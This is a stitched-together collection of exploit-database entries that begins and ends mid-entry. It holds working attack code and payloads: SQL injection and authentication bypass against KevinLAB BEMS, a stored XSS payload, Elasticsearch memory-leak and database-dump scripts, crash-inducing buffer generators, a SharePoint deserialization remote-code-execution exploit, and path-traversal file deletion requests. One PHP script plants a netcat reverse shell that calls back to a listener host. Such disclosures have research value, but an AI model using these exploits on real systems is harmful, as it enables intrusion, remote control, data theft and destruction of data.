------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ogImage"
2021/1626800829_og.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteEmail"
demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_protocal"
mail
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_host"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_user"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_pass"
123456
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_port"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="sendmail_path"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_logs"
1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_sitekey"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_secretkey"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_client_id"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_view_id"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gsearch_cxid"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_key"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lat"
-28.621975
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lng"
150.689082
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="fbapp_id"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="facebook_page_id"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="adobe_cc_apikey"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_bg"
#645862
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_fg"
#ffffff
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_link"
#f1d600
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_msg"
This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_linkmsg"
Privacy Policy and terms.
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_moreinfo"
https://www.cszcms.com/LICENSE.md
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_txtalign"
left
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_close"
Got it!
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="submit"
Save
------WebKitFormBoundary8cAl5KcKGP0D3Qi2--
---
# For more explaination, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32
# The affected version is 1.2.9.
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
05.07.2021
--
PoC POST data payload (extract):
--------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
PoC POST data payload (authbypass):
-----------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
# Date: 23/07/2021
# Exploit Author: Vikas Srivastava
# Software Link: https://wordpress.org/plugins/simple-post/
# Version: 1.1
# Category: Web Application
# Tested on Mac
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Simple Post
3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field.
4. Click Update Options.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145
#/usr/bin/python3
from argparse import ArgumentParser
import requests
from packaging import version
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("\n################################################################################################")
print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######")
print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######")
print("################################################################################################\n")
parser = ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
args = parser.parse_args()
if not (args.url):
parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')
#Prepare authentication header
authorization_header = ""
if(args.api_key or args.basic):
authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic
#Check elasticsearch version
r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
try:
es_version = json.loads(r.content)["version"]["number"]
except:
print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
print("# Server response: " + str(r.content))
exit()
if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
print("# Elastic Service not vulnerable")
print("# Elastic Service version: " + es_version)
print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3")
exit()
#Prepare exploitation
payload = "@\n"
vulnerable_endpoint = "/_bulk"
url = args.url + vulnerable_endpoint
#Exploitation
print("# ElasticSearch Version: " + es_version)
print("# Request to " + url+"\n")
r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)
#Read Memory Leak and remove stacktrace
print("$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$$$$$ Memory Leaked $$$$$")
print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
response = json.loads(r.content)
leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
print(leak1+"\n"+leak2)
# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.noteburner.com/
# Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.leawo.org
# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 6000
try:
f = open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180
import os
import argparse
import sys
######### Check Arguments
def checkArgs():
parser = argparse.ArgumentParser()
parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
parser.add_argument('-s', "--host", action="store",
dest='host',
help="Host to attack.")
parser.add_argument('-p', "--port", action="store",
dest='port',
help="Elastic search port by default 9200 or 9201")
parser.add_argument('-i', "--index", action="store",
dest='index',
help="Index to dump (Example: 30)")
args = parser.parse_args()
if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :
parser.print_help(sys.stderr)
sys.exit(1)
return args
def banner():
print(" _ _ _ _")
print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __")
print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
print(" |_|")
def exploit(host,port,index):
if (index != 0):
final = int(index)
else:
final = 1000000000
cont = 0
while (cont <= final):
os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
cont = cont + 1
if __name__ == "__main__":
banner()
args = checkArgs()
if (args.index):
exploit(args.host,args.port,args.index)
else:
exploit(args.host,args.port,0)
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
from urllib import quote, unquote
import logging
class Exploit(object):
# To generate the gadget use:
# ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
# ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
control_path = control_path_quicklinks
def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
self.username = '%s\\%s' % (domain, username)
self.target = target
self.password = password
self.session = requests.session()
self.redirect = redirect
self.timeout = 0.5
self.proxies = {
'http': 'http://%s' % proxy_address,
'https': 'http://%s' % proxy_address
} \
if proxy_address is not None \
and proxy_address != '' else {}
self.headers = {}
self.query_params = {
'Mode': "Suggestion"
}
self.form_values = {
'__viewstate': '',
'__SUGGESTIONSCACHE__': ''
}
self.cookies = {}
self.payload = """\
<DataSet>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
<xs:element name="somedataset" msdata:IsDataSet="true"
msdata:UseCurrentLocale="true">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="Exp_x0020_Table">
<xs:complexType>
<xs:sequence>
<xs:element name="pwn"
msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
System.Web, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
type="xs:anyType" minOccurs="0"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:schema>
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<somedataset>
<Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
diffgr:hasChanges="inserted">
<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Deserialize</MethodName>
<MethodParameters>
<anyType
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xsi:type="xsd:string">{GADGET}</anyType>
</MethodParameters>
<ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
</ProjectedProperty0>
</pwn>
</Exp_x0020_Table>
</somedataset>
</diffgr:diffgram>
</DataSet>""".replace('{GADGET}', self.gadget)
def do_get(self, url, params=None, data=None):
return self.session.get(
url=url,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
data=data,
params=params,
auth=HttpNtlmAuth(self.username, self.password)
)
def do_post(self, url, data=None, params=None):
return self.session.post(
url=url,
data=data,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
params=params,
auth=HttpNtlmAuth(self.username, self.password)
)
def parse_page(self, content):
soup = BeautifulSoup(content, 'lxml')
for key, val in self.form_values.iteritems():
try:
for tag in soup.select('input[name=%s]' % key):
try:
self.form_values[key] = tag['value']
except Exception as error:
stderr.write('error for key %s error %s\n' % (key, str(error)))
except Exception as error:
stderr.write('error for selector %s error %s\n' % (key, str(error)))
return self
def debug(self):
try:
import http.client as http_client
except ImportError:
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
return self
def clean(self, payload):
payload = payload.replace('\n', '').replace('\r', '')
while ' ' in payload:
payload = payload.replace(' ', ' ')
return payload
def get_form(self):
url = '%s%s' % (self.target, self.control_path)
resp = self.do_get(url=url, params=self.query_params)
self.parse_page(content=resp.content)
return resp
def send_payload(self):
url = '%s%s' % (self.target, self.control_path)
# self.get_form()
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
self.form_values['__viewstate'] = ''
resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
return resp
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
try:
parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')
if len(argv) == 1:
parser.print_help()
exit(1)
options = parser.parse_args()
exp = Exploit(
proxy_address=options.proxy,
username=options.username,
domain=options.domain,
password=options.password,
target=options.target
)
if options.debug:
exp.debug()
stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
options.target, options.username, options.domain, options.password, options.debug, options.proxy
))
result = exp.send_payload()
stdout.write('Response: %d\n' % result.status_code)
if 'MicrosoftSharePointTeamServices' in result.headers:
stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
if options.both and result.status_code != 200:
exp.control_path = exp.control_path_quicklinksdialogform
stdout.write('Trying alternate page\n')
result = exp.send_payload()
stdout.write('Response: %d\n' % result.status_code)
except Exception as error:
stderr.write('error in main %s' % str(error))
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://xos-shop.com
# Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9
# Version: 1.0.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1
################
# Description #
################
# XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
##########
# PoC 1 #
##########
Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php
Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php
Steps to Reproduce:
1. Login as admin
2. Goto Catalog > Manufacturers > edit any manufacturer
3. Upload any image as "Manufacturers Image" and click save button
4. Then, tick "Delete" checkbox and click save button
5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image".
# Assumed there is a backup.conf file in web root
PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root
Request:
========
POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678
Content-Length: 1305
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[2]"
App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[1]"
App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[3]"
App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[2]"
app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[1]"
app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[3]"
app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="delete_manufacturer_image"
true
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="current_manufacturer_image"
../../backup.conf
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_image"; filename=""
Content-Type: application/octet-stream
-----------------------------120849309142309531191692203678--
---
##########
# PoC 2 #
##########
Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php
Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php
Note: Multiple parameters affected
Steps to Reproduce:
1. Login as admin
2. Goto Catalog > Categories/Products > edit any category
3. Upload any image as "Category Image" if there is no existing image and click save button else,
4. Tick "Delete" checkbox and click save button
5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image".
# Assumed there is a backup.conf file in web root
PoC #2) param current_category_image - Deleting backup.conf file in web root
Request:
========
POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599
Content-Length: 2524
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_id"
1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_category_image"
../../../backup.conf
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="category_name"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_categories_or_pages_status"
1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="delete_category_image"
true
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_image"; filename=""
Content-Type: application/octet-stream
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="product_list_b"
0
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="sort_order"
10
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_status"
1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[2]"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[1]"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[3]"
Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[2]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[1]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[3]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[2]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[1]"
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[3]"
-----------------------------95672159210084798032704634599--
---
# For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1
# The affected version is prior to v1.0.9.
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat
#!/usr/bin/python3
"""
Usage :
python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337
"""
import requests
import threading
import datetime
import sys
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds
def fuzz():
targetIP = sys.argv[1]
listnerIP = sys.argv[2]
listnerPORT = sys.argv[3]
global newDatetime
while True:
try:
if datetime.datetime.now() > newDatetime:
exit()
# proxies = {
# "http": "http://127.0.0.1:8080",
# "https": "https://127.0.0.1:8080",
# }
sessionName = "SiLvER"
url = targetIP
s = requests.Session()
cookies = {'PHPSESSID': sessionName}
files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
except Exception as error:
print(error)
exit()
def main():
print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
threads = []
for _ in range(20):
t = threading.Thread(target=fuzz)
t.start()
threads.append(t)
for thread in threads:
thread.join
if __name__ == "__main__":
if len(sys.argv) < 4:
print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
print("\n(=) By SiLvER \n")
exit()
else:
main()
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Date: 27 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824
